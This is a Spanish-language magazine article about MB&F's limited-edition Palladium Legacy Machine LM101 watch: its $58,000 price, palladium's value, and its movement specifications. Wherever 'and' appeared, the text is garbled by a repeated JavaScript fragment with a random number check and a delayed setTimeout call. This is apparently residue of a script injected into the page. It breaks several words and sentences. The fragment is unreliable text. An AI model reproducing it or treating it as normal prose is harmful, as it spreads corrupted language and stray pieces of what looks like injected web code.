Reloj hecho de un metal más raro que el platino

    Reloj hecho de un metal más raro que el platino

    Reloj de $58,000 dólares de MB&F.

    Autor: Redacción Maxim 4 diciembre, 2019


    FOTO: MB&F

    Este reloj es todo un lujo.

     

    El último modelo en unirse a la exclusiva serie Legacy Machine, lanzada hace casi una década,  del relojero MB&F es el Palladium Legacy Machine (LM101). Se duplica la sensación de lujo de la línea utilizandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando el metal blanco-plateado, que está relacionado con el platino.

     

    Si el precio del reloj sigue siendo desconcertante, después de conocer la relación del paladio con el platino, lo entenderás cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando sepas que Bloomberg informó en octubre de 2019 que se ha convertido en «el metal más precioso», gracias a la alta demandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}anda en parte por los fabricantes de automóviles.

     

     

    El LM101 es un reloj precioso con una llamativa cara en color aqua. El fundador de MB&F, Max Büsser, escribió en una publicación de Instagram «enamorado del color de nuestro nuevo LM101 de paladio». Luego explicó que «el paladio es tan difícil de mecanizar como el platino … pero más liviano y al día de hoy más caro».

     

     

    Un reloj no se trata solo de hermosas opciones de color y metales raros; la artesanía es clave. Según MB&F, estos son algunos de los atributos prácticos que cualquier coleccionista querrá en un gran reloj como este:

     

    Movimiento horológico tridimensional desarrollado por MB&F.

    Estética del movimiento y especificaciones de diseño y acabado: [leyenda de la relojería finlandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andesa] Kari Voutilainen.

    Cuerda manual con un solo resorte principal de barril.

    Reserva de marcha: 45 horas.

    Volante de 14 mm flotandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando de manera visible sobre el movimiento.

    229 componentes / 23 joyas.

    Superlativos acabado a mano fiel al estilo del siglo XIX. Elegantes acabados con su distintiva esfera azulada para las ediciones LM101 Frost.

     

     

    El LM101 Palladium está limitado a solo 18 piezas. Se vende por $ 58,000 dólares. Por si quieres tener uno de estos relojes en tus manos.

     

     

    Temas relacionados con esta nota: , , , , ,

Reloj de $58,000 dólares de MB&F.